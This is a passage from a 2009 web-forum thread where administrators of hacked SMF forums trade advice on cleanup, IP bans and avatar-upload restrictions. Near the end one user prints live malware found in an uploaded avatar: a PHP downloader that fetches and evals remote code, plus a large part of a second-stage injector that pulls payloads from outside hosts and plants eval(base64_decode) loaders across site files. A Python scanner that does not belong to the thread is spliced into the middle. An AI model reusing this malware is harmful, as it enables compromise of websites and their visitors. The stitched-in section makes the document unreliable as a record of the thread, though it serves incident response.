Now, clean as a whistle.
Title: Re: Hacked, script injection
Post by: MrPhil on May 07, 2009, 01:08:24 PM
adding an .htaccess file with this php_value engine off entry should work.

On many systems it won't work, as php_value and php_flag are not permitted in .htaccess. For those systems, put something like engine = off in a php.ini file. You may also need to put an entry in .htaccess to tell PHP where to find that file.

Thanks for this. Although it seems a little absurd that hosts prevent these options in .htaccess but yet let the user run a custom php.ini :o

I don't think that the intent is to ban setting changes and then open up the door... AFAICT, the intent is simply to get all the PHP cruft out of .htaccess and put it all in one place: php.ini. Why not? It's just that people who are used to putting PHP settings into .htaccess need to keep in mind (when giving advice about PHP setting changes) that not everyone can do it that way. Some people even advise changing httpd.conf, but users on shared servers usually can't change it. Some people still tell others to just change all their permissions to 777 when 1) this is hazardous in some cases and 2) some hosts don't permit this. The bottom line is that you can't just say "change this file", but need to couch it in terms of all the possible places that changes could need to be.

Perhaps there should be some place in this community to point users to when they need to make PHP setting changes. It would discuss the different places and different formats they may encounter on different systems. This entry could also discuss using phpinfo() to see if changes "stick". Another entry could discuss proper permissions needed for various SMF functions, and what to do to change permissions.
Title: Re: Hacked, script injection
Post by: JBlaze on May 07, 2009, 01:22:52 PM
All your base64_decode are belong to us!

Heh :P
Title: Re: Hacked, script injection
Post by: Rumboogy on May 07, 2009, 02:22:41 PM
So is this Krisbarteo a BOT or a real person? Just curious if the anti-SPAM would have caught this...

Thanks,

Wally
Title: Re: Hacked, script injection
Post by: confusion on May 07, 2009, 02:36:27 PM
Interestingly, I have the Krisbarteo user on a few forums, and he dropped avatars on them, but my forums did not get infected. I am running the Suhosin module for php - were any of the people who did get "hacked" running Suhosin? I have the avatar if anyone is interested.
Title: Re: Hacked, script injection
Post by: JBlaze on May 07, 2009, 03:30:44 PM
So is this Krisbarteo a BOT or a real person? Just curious if the anti-SPAM would have caught this...

Thanks,

Wally

So far, the only Anti-Spam mod that will catch him is the Stop Spammer (http://custom.simplemachines.org/mods/index.php?mod=1547) mod as his username, email and IP are reported to the spam blacklist. This mod will catch him if he registers and will prevent posting or anything until admin approval.
Title: Re: Hacked, script injection
Post by: busterone on May 07, 2009, 06:59:43 PM
I had 4 from the 94.142.*.* range to register before this Krisbarteo situation arose. They all had different email addies and IPs, and I believe they were human. They successfully navigated the "are you human" mod, confirmed their email, and then logged on to the forum. Each time, they were online no more than 5 minutes and logged out.
I thought it was odd that I had 4 from the same range in just a few days, and that they left right after logging on. After this thread started, I realized what was going on. As I stated earlier in this thread, I do not allow anyone but admins to upload an avatar or attachment. I believe this is what prevented mine from being hacked. They are probably all connected to each other in some way or another.
I banned them all, deleted them, and went a step farther.  I banned the range in htaccess. Now if they or another cohort attempts to return, they get a 404 error page instead of the forum.
Title: Re: Hacked, script injection
Post by: chrishicks on May 07, 2009, 07:08:42 PM
Please be advised that this user is also using another alias - something like MagicOPromotion

magicpromotionmm@gmail.com
94.142.128.140
IP address   94.142.128.140
Hostname   Not available
ISP   SIA CSS GROUP hosting
Country   Latvia


He tried registering on my forum, but, I don't allow avatar uploads for new users and I deleted him promptly in any event  8)


http://www.stopforumspam.com/search?q=94.142.128.140

Lots of stuff listed on that IP there.
Title: Re: Hacked, script injection
Post by: busterone on May 07, 2009, 07:10:48 PM
Indeed, very busy one that one is. :)
Title: Re: Hacked, script injection
Post by: Edvard on May 08, 2009, 02:19:35 AM
Our forum also got 'f.i.t.a.' by Krisbarteo. I actually manually granted this guy access to our forum, not being made suspicious by his name. If only I had been suspicious, I could have saved myself a lot of time right now during exam period at the university...  >:( Actually I was running 1.1.4, if I'm not mistaken, together with a similarly old version of Joomla. Yes, I know, old, but I was supposed to upgrade this summer, before handing over the admin task to a friend of mine.

Also, in our forum, I found the base-64 at the top, and in many .php and .html files I found malicious links to some Russian sites that would invariably infect visiting machines with rootkit.hacktool. I believe my machine now also is infected with it and I haven't had the time to rid it of that.

What did I do:
- delete the whole public_html directory on the server
- uploaded my latest backup dating from December 2007 (!)
- carefully adding files from a backup I took after the virus attack (attachments, avatars, updated code)

The site and forum ran again, but only a short time after I got messages on my own machine and from forum members that it was trying to infect machines again.

I just got so angry, after having used so much time on this silly virus, but I just must slay it...

So, I deleted all of my files from the server again. Now for some reason I don't even have public_html left so I will have the web hotel restore it again, so I can once more upload my backup from 2007. This time, I will make sure to upgrade both Joomla and SMF to the newest versions before meticulously putting back files from my infected backup.

By the way, I cannot see that Krisbarteo had uploaded any avatar, strangely enough. Must he have done that, in order to spread the virus onto our site, or could he have done it otherwise? Neither does our forum give users the option of changing the template, it is set on the one I made.

When meticulously putting files back from the infected version, apart from the first line containing the base-64 code, what other code should I be wary about? And are there any files in particular that can make the virus spring up again?
Title: Re: Hacked, script injection
Post by: kwah on May 08, 2009, 04:43:08 AM
There are a number of forum installations reported to be vulnerable to this hack.

I am not sure, but did I miss official opinion from SMF developers on the problem?
Title: Re: Hacked, script injection
Post by: Kindred on May 08, 2009, 07:58:07 AM
Edvard,

Check with your host about a backup.  Typically the host saves a backup at least once a month, so they may be able to restore your site to a set more recent than 2007.

If you were running 1.1.4, there are a number of ways that you could have been infected. That is why it is critical to keep up to date with security releases.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 08, 2009, 11:21:03 AM
This has got me pretty nervous.

Also, I found this in my referrer file:
Code: [Select]
Referrer : http://www.google.com.ph/search?q=powered+by+smf+Incandescent+bulb&hl=tl&start=270&sa=N
User Agent : mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.1) gecko/20061010 firefox/2.0
IP Address : http://whois.domaintools.com/120.28.76.113
Date and Time : Thursday 07th May 2009 01:33:05 AM

This IP is from the Philippines and it looks like they're searching for "Powered By SMF" sites which I'm guessing can't be good. I don't know what the rest of the search string is all about though.

Title: Re: Hacked, script injection
Post by: pr9phet on May 08, 2009, 12:44:31 PM
So did someone come up with a sure fire way to prevent this from working, other than disabling avatar uploads?
Title: Re: Hacked, script injection
Post by: confusion on May 08, 2009, 01:07:26 PM
Quote
This has got me pretty nervous.

Also, I found this in my referrer file:
Code: [Select]
Referrer : http://www.google.com.ph/search?q=powered+by+smf+Incandescent+bulb&hl=tl&start=270&sa=N
User Agent : mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.1) gecko/20061010 firefox/2.0
IP Address : http://whois.domaintools.com/120.28.76.113
Date and Time : Thursday 07th May 2009 01:33:05 AM

This IP is from the Philippines and it looks like they're searching for "Powered By SMF" sites which I'm guessing can't be good. I don't know what the rest of the search string is all about though.



Don't be too worried about this.  Someone is trying to link spam their site to other sites that google finds relevant to the term "incandescent bulbs".  It's a common tactic to search for forums to spam that are related to your target keyword.  The "powered by smf" is a good string to find forums that will allow links and are almost always do-follow.
Title: Re: Hacked, script injection
Post by: rbbot on May 08, 2009, 04:14:17 PM
I'd recommend banning the subnet 94.142.128.0/21, which is the subnet allocated to the AS number of the Latvian hosting company from which these attacks originate - at your firewall if you can, rather than in the forum settings. According to their website, it's not an ISP, just a hosting provider, so unless you are expecting other servers to connect to yours....

The hosting company is http://www.cssgroup.lv/?lang=eng
Title: Re: Hacked, script injection
Post by: whatnow on May 08, 2009, 10:01:55 PM
I need some help, I have been hacked by this and just found this thread tonight. I have been checking php files all day and when I read here that almost all of them have been hacked, I started opening them all and found the code in many.

Now I am having major problems with my website, when I make a post, I get a blank page, but then if I hit my back key the post is there, I tried to put my forum in maintenance mode now and I get a blank page but it is in maintenance mode.. I have been at this since yesterday at 4 when I realized I had been hacked by KrisBarteo at around noon yesterday.

What do I do now, is it better to clean the coding out of the php files or just put all new ones in, and what is causing my pages to go blank now?

Thanks
GrannyD
Title: Re: Hacked, script injection
Post by: Tiribulus on May 08, 2009, 10:26:47 PM
Quote
This has got me pretty nervous.

Also, I found this in my referrer file:
Code: [Select]
Referrer : http://www.google.com.ph/search?q=powered+by+smf+Incandescent+bulb&hl=tl&start=270&sa=N
User Agent : mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.1) gecko/20061010 firefox/2.0
IP Address : http://whois.domaintools.com/120.28.76.113
Date and Time : Thursday 07th May 2009 01:33:05 AM

This IP is from the Philippines and it looks like they're searching for "Powered By SMF" sites which I'm guessing can't be good. I don't know what the rest of the search string is all about though.



Quote
Don't be too worried about this.  Someone is trying to link spam their site to other sites that google finds relevant to the term "incandescent bulbs".  It's a common tactic to search for forums to spam that are related to your target keyword.  The "powered by smf" is a good string to find forums that will allow links and are almost always do-follow.

I meant that this topic as a whole has me worried, but I do appreciate the explanation. Still doesn't sound too good though.
Title: Re: Hacked, script injection
Post by: oakview on May 08, 2009, 10:42:24 PM
It's not just this Krisbarteo, there are other aliases being used, and from different IP blocks. I tracked the activity for a couple of days until I had identified all the IP's being used and added them to our .htaccess file. As I mentioned before, the RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everyone's best interest. Since we have blocked most of RIPE, we've not had any issues whatsoever. Shame we have to do that as I'm sure there are many legitimate PC users in RIPE countries. Apologies to them and a pox on the other abusers.

If anyone can use the IP ranges we now block for their own purpose, here they are. Add to, delete from, tweak to suit your own user community needs. It's not terribly organized but so far has been effective:

Code: [Select]
order allow,deny
deny from 62.
deny from 80.
deny from 81.
deny from 82.
deny from 83.
deny from 84.
deny from 85.
deny from 86.
deny from 87.
deny from 88.
deny from 89.
deny from 90.
deny from 91.
deny from 94.
deny from 95.
deny from 109.
deny from 139.10.
deny from 139.12.
deny from 139.16.
deny from 139.18.
deny from 139.24.
deny from 139.28.
deny from 139.30.
deny from 147.83.
deny from 147.84.
deny from 147.91.
deny from 178.
deny from 193.
deny from 194.
deny from 195.
deny from 212.
deny from 213.
deny from 217.
deny from 58.
deny from 59.
deny from 60.
deny from 61.
deny from 165.228.
deny from 165.229.
deny from 168.140.
deny from 202.
deny from 203.
deny from 210.
deny from 211.
deny from 218.
deny from 219.
deny from 220.
deny from 221.
deny from 222.
allow from all
Title: Re: Hacked, script injection
Post by: Sunday Driver on May 08, 2009, 10:50:28 PM
Please be advised that this user is also using another alias - something like MagicOPromotion

magicpromotionmm@gmail.com
94.142.128.140
IP address   94.142.128.140
Hostname   Not available
ISP   SIA CSS GROUP hosting
Country   Latvia


He tried registering on my forum, but, I don't allow avatar uploads for new users and I deleted him promptly in any event  8)

Interesting, I had that user on my forum for a while. It took me a few days before I found it and banned the IP, but it never uploaded an avatar. Thankfully!
Title: Re: Hacked, script injection
Post by: busterone on May 08, 2009, 11:00:15 PM
Quote
It's not just this Krisbarteo, there are other aliases being used, and from different IP blocks. I tracked the activity for a couple of days until I had identified all the IP's being used and added them to our .htaccess file. As I mentioned before, the RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everyone's best interest. Since we have blocked most of RIPE, we've not had any issues whatsoever. Shame we have to do that as I'm sure there are many legitimate PC users in RIPE countries. Apologies to them and a pox on the other abusers.

If anyone can use the IP ranges we now block for their own purpose, here they are. Add to, delete from, tweak to suit your own user community needs. It's not terribly organized but so far has been effective:

Code: [Select]
order allow,deny
deny from 62.
deny from 80.
deny from 81.
deny from 82.
deny from 83.
deny from 84.
deny from 85.
deny from 86.
deny from 87.
deny from 88.
deny from 89.
deny from 90.
deny from 91.
deny from 94.
deny from 95.
deny from 109.
deny from 139.10.
deny from 139.12.
deny from 139.16.
deny from 139.18.
deny from 139.24.
deny from 139.28.
deny from 139.30.
deny from 147.83.
deny from 147.84.
deny from 147.91.
deny from 178.
deny from 193.
deny from 194.
deny from 195.
deny from 212.
deny from 213.
deny from 217.
deny from 58.
deny from 59.
deny from 60.
deny from 61.
deny from 165.228.
deny from 165.229.
deny from 168.140.
deny from 202.
deny from 203.
deny from 210.
deny from 211.
deny from 218.
deny from 219.
deny from 220.
deny from 221.
deny from 222.
allow from all
I would consider that to be cutting off the nose to spite the face.  That eliminates practically all of Europe. I have a multinational member base, and quite a few are from UK, Norway, Netherlands, Germany, and Sweden.  If your forum is catering locally only, it will suffice, but with overkill.
Title: Re: Hacked, script injection
Post by: JBlaze on May 08, 2009, 11:28:57 PM
OK, since I am getting quite a few PM's from members who are having problems with this hack on their forums, let me make it clear that I DO NOT offer PM support. Any PM's requesting support without my prior consent WILL BE IGNORED/DELETED!

If you wish to receive support from me regarding this hack, whether it be cleaning it or just pure advice on how to do it yourself, please see my Help Available (http://www.simplemachines.org/community/index.php?topic=302699.0) topic and we will go from there.

I am sorry to sound cranky/senile/whatever... but to be quite honest, it's getting ridiculous. I try my best to offer support when I can and I do have a heart believe it or not. But PM'ing me for support just drives me up a wall. The reason for these forums is so that everyone can see the issue and everyone can provide some help where they can.

So pretty please with lots of sugar on top, do not PM me unless I give you consent to do so. Thank you.

Regards,
JBlaze
Title: Re: Hacked, script injection
Post by: oakview on May 09, 2009, 03:41:21 AM
Quote
I would consider that to be cutting off the nose to spite the face.  That eliminates practically all of Europe. I have a multinational memberbase, and quite a few are from UK, Norway, Netherlands, Germany, and Sweden.  If your forum is catering locally only, it will suffice, but with overkill.
@busterone - Like I said in my post,
Quote
the RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everyone's best interest.
If you are multi-national as I'm sure many forums are, that approach is not for you. For those that aren't however, it is an option to be considered, carefully considered.
Title: Re: Hacked, script injection
Post by: busterone on May 09, 2009, 08:49:14 AM
No problem. If it works, it works.  :)
Title: Re: Hacked, script injection
Post by: Soulgirl on May 09, 2009, 09:13:09 AM
I had this problem too... cleaned everything out and still had problems.  Google led me here and I too had krisbarteo as a member.  Banned and deleted him and everything's back to normal.

Thanks guys :)
Title: Re: Hacked, script injection
Post by: NinjaZXR on May 09, 2009, 11:32:16 AM
Quote
I need some help, I have been hacked by this and just found this thread tonight. I have been checking php files all day and when I read here that almost all of them have been hacked, I started opening them all and found the code in many.

Now I am having major problems with my website, when I make a post, I get a blank page, but then if I hit my back key the post is there, I tried to put my forum in maintenance mode now and I get a blank page but it is in maintenance mode.. I have been at this since yesterday at 4 when I realized I had been hacked by KrisBarteo at around noon yesterday.

What do I do now, is it better to clean the coding out of the php files or just put all new ones in, and what is causing my pages to go blank now?

Thanks
GrannyD

Rather than editing all php files I just replaced all files and folders from a recent backup.
No more errors on the forum.
This should serve as a good reminder to create regular backups.
Title: Re: Hacked, script injection
Post by: tumbleweed on May 09, 2009, 10:07:51 PM
It appears our friend has posted up his tactics; all these folks tried to join within a day:

Hope everyone has tightened up the forums.
Title: Re: Hacked, script injection
Post by: JBlaze on May 09, 2009, 10:25:20 PM
Mine's sealed up tighter than a crab's ass :P
Title: Re: Hacked, script injection
Post by: busterone on May 09, 2009, 10:48:53 PM
 :D
Mine as well. I haven't even had a valid registration in 3 days.
Title: Re: Hacked, script injection
Post by: WillyP on May 09, 2009, 11:04:21 PM
One of my forums got hit by Krisbarteo too. Every php file on the domain same as described here. So I created a post based member group to prevent uploading and attaching until a member has 10 posts. There was an uploaded avatar, the only avatar that was a jpg, 1x1 pixel. Opened it up and sure enough php code. I wonder if the upload script could compare file size to image size and flag suspicious files? Would this be easier than scanning a file for php tags? For that matter, who would ever upload a 1x1 image anyway?  Of course, if a minimum image size was enacted, it would be pretty easy for someone to just use a larger image.
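Along the lines WillyP raises above (flag an uploaded "image" whose byte size does not fit its pixel count, or that carries PHP tags), here is an added Python example; it is not SMF's upload code and not from anyone in this thread. It also checks .php files for the eval(base64_decode(...)) loader quoted at the top of the thread; the regexes, the `bytes_per_pixel` and `slack` thresholds, the function names and the sample files are my own assumptions and constructions.

```python
"""Added example (not SMF code): offline checks for the two artefacts this
thread describes, a PHP payload hidden in an uploaded avatar and the
eval(base64_decode(...)) loader prepended to .php files."""
import re
import struct
from pathlib import Path

# PHP open tags that have no business inside an image file.
PHP_TAG_RE = re.compile(rb"<\?php\b|<\?=|<\?\s|<script[^>]*language\s*=\s*['\"]?php", re.I)
# The injected loader: "<?", optional "php", optional /**/, then eval(base64_decode(
B64_LOADER_RE = re.compile(
    rb"^\s*<\?(?:php)?\s*(?:/\*\*/)?\s*eval\s*\(\s*base64_decode\s*\(", re.I)


def image_dimensions(data: bytes):
    """Return (format, width, height) parsed from a GIF, PNG or JPEG header, else None."""
    if data[:6] in (b"GIF87a", b"GIF89a") and len(data) >= 10:
        w, h = struct.unpack("<HH", data[6:10])          # logical screen size, little-endian
        return ("gif", w, h)
    if data[:8] == b"\x89PNG\r\n\x1a\n" and data[12:16] == b"IHDR" and len(data) >= 24:
        w, h = struct.unpack(">II", data[16:24])         # IHDR width/height, big-endian
        return ("png", w, h)
    if data[:2] == b"\xff\xd8":
        i = 2
        while i + 9 < len(data):                         # walk JPEG segments to the SOFn marker
            if data[i] != 0xFF:
                break
            marker = data[i + 1]
            if marker == 0xD8 or marker == 0x01 or 0xD0 <= marker <= 0xD7:
                i += 2                                   # standalone markers carry no length
                continue
            if marker in (0xD9, 0xDA):
                break                                    # EOI / SOS reached without a SOF
            seg_len = struct.unpack(">H", data[i + 2:i + 4])[0]
            if 0xC0 <= marker <= 0xCF and marker not in (0xC4, 0xC8, 0xCC):
                h, w = struct.unpack(">HH", data[i + 5:i + 9])   # SOFn: precision, height, width
                return ("jpeg", w, h)
            i += 2 + seg_len
    return None


def scan_avatar(data: bytes, bytes_per_pixel: int = 16, slack: int = 256) -> list:
    """Findings for an uploaded avatar: embedded PHP tags, an unparseable image,
    or a file far larger than its pixel count justifies (the 1x1 trick).
    The thresholds are assumed heuristics, tune them to your own avatars."""
    findings = []
    if PHP_TAG_RE.search(data):
        findings.append("php-tag")
    dims = image_dimensions(data)
    if dims is None:
        findings.append("not-an-image")
    else:
        _fmt, w, h = dims
        if w == 0 or h == 0 or len(data) > slack + bytes_per_pixel * w * h:
            findings.append("size-mismatch")
    return findings


def is_base64_loader(data: bytes) -> bool:
    """True if a .php file starts with the injected eval(base64_decode(...)) stub."""
    return B64_LOADER_RE.match(data[:512]) is not None


def scan_tree(root) -> dict:
    """Walk a forum directory and map each suspicious file to its findings."""
    report = {}
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        ext = p.suffix.lower()
        data = p.read_bytes()
        if ext in (".php", ".php3", ".phtml") and is_base64_loader(data):
            report[str(p)] = ["base64-loader"]
        elif ext in (".gif", ".png", ".jpg", ".jpeg"):
            found = scan_avatar(data)
            if found:
                report[str(p)] = found
    return report


# Constructed samples: a genuine 1x1 GIF, the same GIF with PHP appended, a
# 120x120 PNG header, and a .php file with a placeholder base64 loader stub.
CLEAN_GIF = (b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x80\x00\x00" + b"\x00\x00\x00\xff\xff\xff"
             + b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00" + b"\x02\x02\x44\x01\x00" + b"\x3b")
TROJAN_GIF = CLEAN_GIF + b"\n<?php eval(base64_decode('" + b"QUJD" * 120 + b"')); ?>"
PNG_120 = (b"\x89PNG\r\n\x1a\n" + struct.pack(">I", 13) + b"IHDR" + struct.pack(">II", 120, 120)
           + b"\x08\x06\x00\x00\x00" + b"\x00" * 40)
INJECTED_PHP = b"<?php /**/eval(base64_decode('" + b"QUJDREVG" * 8 + b"'));?>\n<?php\n// SMF file follows\n"

if __name__ == "__main__":
    print(scan_avatar(CLEAN_GIF), scan_avatar(TROJAN_GIF), scan_avatar(PNG_120))
    print(is_base64_loader(INJECTED_PHP))
```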
Title: Re: Hacked, script injection
Post by: chrishicks on May 09, 2009, 11:46:37 PM
Ever think these hackers come here to see what everyone is saying for future research? It wouldn't be hard to come here, look around at all these posts and see what everyone is saying on how to prevent the attacks and then just adjust to our adjustments. Plus, with all the websites listed all around the board they have an unlimited supply of potential victims.
Title: Re: Hacked, script injection
Post by: tjhanes on May 10, 2009, 06:07:37 AM
I dunno if this will help anyone but the content of the avatar is the following:
I've cleaned it up a little.

Code: [Select]
<?php;$url 'http://wplsat23.net/?update=main';$done false;if(!$url){return '';}$url_info parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" $url_info[query] : ""; $query "GET " $url_info[path] . " HTTP/1.1\r\n"; $query $query "Host: " $url_info[host] . "\r\n"; $query $query "Accept: */*" "\r\n"; $query $query "Connection: close" "\r\n"; $query $query "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "\r\n"; $query $query "\r\n"; $errno 0; $error ""; $sock fsockopen($url_info[host], $url_info[port], $errno$error30);$h = array();$resp = array();if($sock){stream_set_timeout($sock30);fwrite($sock$query);$hd false;while(!feof($sock)){$l fgets($sock);if(!$hd){if(trim($l) == ''){$hd true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret implode(""$resp);eval($ret);?>
and this is the code on that page:
Code: [Select]
$ver = "1.0";
$GLOBALS['dbg'] = 0;
$GLOBALS['rewrite_old'] = 1;

set_time_limit(600);
$pu = "http://nomsat23.net/?update=js&host={$_SERVER['HTTP_HOST']}";
$eu = "http://nomsat23.net/?update=shl&host={$_SERVER['HTTP_HOST']}";

//$pu = "http://wpl/?update=js&host={$_SERVER['HTTP_HOST']}";
//$eu = "http://wpl/?update=shl&host={$_SERVER['HTTP_HOST']}";

$GLOBALS['dgin'] = "style.css.php";
$GLOBALS['dgsf'] = "s.php";
$GLOBALS['dgdn'] = "dg.php";
$GLOBALS['dgfn'] = "";

//detect full path
if(!file_exists($_SERVER['SCRIPT_FILENAME'])){
if(file_exists($_SERVER['PATH_TRANSLATED'])){
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
}else{
die("<b style='color:red'>can't detect exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[49295073]");
}
}
$_SERVER['SCRIPT_FILENAME'] = str_replace('\\', '/', $_SERVER['SCRIPT_FILENAME']);
$_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']);
echo "<b style='color:green'>exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[6910002]<br>";

$tmp = explode("/", $_SERVER['REQUEST_URI']);
$GLOBALS['dglvl'] = count($tmp) - 2;
echo"{$ver}<h2>http://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}</h2>";

$path = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = array_slice($path, 0, count($path) - 1);
$GLOBALS['fpath'] = implode("/", $path) . '/';

//detecting real path
$uri = explode("/", $_SERVER['REQUEST_URI']);
$uri = array_slice($uri, 0, count($uri) - 1);

//print_r($path);
//print_r($uri);

while(count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])){
unset($uri[count($uri) - 1]);
unset($path[count($path) - 1]);
}
//echo"<hr>";
//print_r($path);
//print_r($uri);

$GLOBALS['dgsp'] = implode("/", $path) . '/';

if(isset($_GET['dgd'])){
error_reporting(E_ALL & ~E_NOTICE);
}else{
error_reporting(0);
}

if(isset($_GET['phpinfo'])){
phpinfo();
die;
}

//$GLOBALS['dgsp'] = $_SERVER['DOCUMENT_ROOT'];
if(substr($GLOBALS['dgsp'], strlen($GLOBALS['dgsp']) - 1, 1) <> '/'){
$GLOBALS['dgsp'] .= '/';
}

echo"<b style=\"color:green\">root dir path [{$GLOBALS['dgsp']}]</b><br><br>";

$GLOBALS['dgcgr'] = 0;
$GLOBALS['dgcgrf'] = 0;
$my_uid = getmyuid();
$my_gid = getmygid();
$my_cid = get_current_user();
echo "SYSTEM: " . `uname -a` . "<br>";
if(ini_get('safe_mode')){echo "<h1 style='color:red'>SAFE MODE</h1>";}

echo"MY USER ID: {$my_uid}; MY GROUP ID: $my_gid; CURRENT USER: {$my_cid}<br>";

if(!function_exists('phpinj')){
function phpinj($ff, &$str, $inj = 0, $silent = true){
global $_SERVER;
$alien_shells = array("los.php","r0x.php");
$our_folder = 0;
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!$folder){
if(!$silent){echo"<font color='red'>bad folder path [{$folder}]</font><br>";}
return;
}
if(!is_dir($folder)){
if(!$silent){echo"<font color='red'>{$folder} - is not a folder</font><br>";}
return;
}
if($GLOBALS['dgdirs'][$folder]){
if(!$silent){echo"<font color='yellow'>{$folder} already checked</font><br>";}
return;
}
$GLOBALS['dgdirs'][$folder] = 1;

if($folder == $GLOBALS['dgcp'] || file_exists($folder.$GLOBALS['dgin'])){
if(!$silent){echo"<h4>{$folder} is our dir, skipping...</h4>";}
$our_folder = 1;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);

$file_stat = stat($folder);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_gidn}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
if(!$silent){echo"{$file_info}[$dir_perm] {$folder}<br>";flush();}
$h = opendir($folder);
if(!$h){
if(!$silent){echo"<font color='red'>{$folder}</font><br>";}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..'){
continue;
}
$pc = 0;
$mkr = md5($f);
$lc = "";
$lp = "";
$fh = false;

$file = $folder.$f;
if($f == $_SERVER['SCRIPT_FILENAME']){
if(!$silent){echo"<h4>{$file} is our exploit</h4>";}
continue;
}
if(is_file($file) && !$our_folder){
if($f == 'functions.php' && (strlen($folder) - strrpos($folder, "wp-includes") == 12)){
if(can_write($file)){
echo"<b style='color:green'>{$file}</b><br>";
dgrself($file, $silent);
}else{
echo"<b style='color:red'>{$file}</b><br>";
}
}
if($f == 's.php'){
if(!$silent){echo"<font color='red'>{$file} is shell</font><br>";}
continue;
}
if(in_array(strtolower($f), $alien_shells)){
if(unlink($file)){
if(!$silent){echo"<h3 style='color:green'>{$file} ALIEN SHELL</h3>";}
}else{
if(!$silent){echo"<h3 style='color:red'>{$file} ALIEN SHELL</h3>";}
}
continue;
}
if(!in_array(strtolower(gfe($file)), array("php","phtml","php3"))){
continue;
}
if($GLOBALS['dgfiles'][$file]){
if(!$silent){echo"<font color='yellow'>{$file} already checked</font><br>";}
continue;
}
$GLOBALS['dgfiles'][$file] = 1;
$file_stat = stat($file);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_stat['name']}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
$file_perm_was = substr(sprintf('%o', fileperms($file)), -4);
$file_handler = fopen($file, "a+");
$perms_str = "{$file_info}[{$file_perm_was}] ";
if(!$file_handler){
if(!$silent){echo"{$perms_str}<font color='red'>{$file}</font><br>";flush();}
continue;
}
fclose($file_handler);
$fc = implode("", file($file));
$nc = preg_replace("/\<\!\-\-$mkr\-\-\>.*\<\!\-\-$mkr\-\-\>/siU", "", $fc);
$nc = preg_replace("/^\s*\<\?(\w{3})?\s*\/\*\*\/\s*eval\(base64_decode.*\)\)\;\s*\?\>\s*(\S)/siU", "$2", $nc);
clear_exploits($nc);
if($nc <> $fc){$lc = " <b>[cleared]</b>";}else{$lc = " <b>[not patched]</b>";}
if(preg_match("/\@zend/i", $nc)){
if(!$silent){echo"{$perms_str}<b>ZEND</b> <font color='red'>{$file}</font>{$lc}<br>";flush();}
}elseif($inj && strpos(strtolower($folder), '/cache/')){
$lp = " <b style='color:orange'> [cached file]</b>";
}elseif($inj){
$nc = "{$ot}{$str}{$ot}\n{$nc}";
$lp = " <b> [patched]</b>";
}
if($fc <> $nc){
save_text_to_file($file, $nc, "$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>", 1, $silent);
}else{
if(!$silent){echo"$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>";}
}
}elseif(is_dir($file)){
phpinj($file.'/', $str, $inj, $silent);
}
}
closedir($h);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_exploits')){
function clear_exploits(&$text){
$text = preg_replace("/\<\?(\w{3})?\s*eval\(base64_decode.*\)\)\;\s*\?\>/siU", "", $text);
}
}

if(!function_exists('can_write')){
function can_write($fn){
$f = fopen($fn, "a");
if($f){
fclose($f);
return true;
}else{
return false;
}
}
}

if(!function_exists('leave_clear_php')){
function leave_clear_php(&$txt){
$txt = substr($txt, strpos($txt, '<?'), strlen($txt));
$txt = substr($txt, 0, strrpos($txt, '?>') + 2);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('download')){
function download($url, $connect_timeout){
$done = false;
if(!$url){return '';}

$url_info = parse_url($url);
$url_info[port] = ($url_info[port]) ? $url_info[port] : 80;
$url_info[path] = ($url_info[path]) ? $url_info[path] : "/";
$url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : "";
$query = "GET " . $url_info[path] . " HTTP/1.1\r\n";
$query = $query . "Host: " . $url_info[host] . "\r\n";
$query = $query . "Accept: */*" . "\r\n";
$query = $query . "Connection: close" . "\r\n";
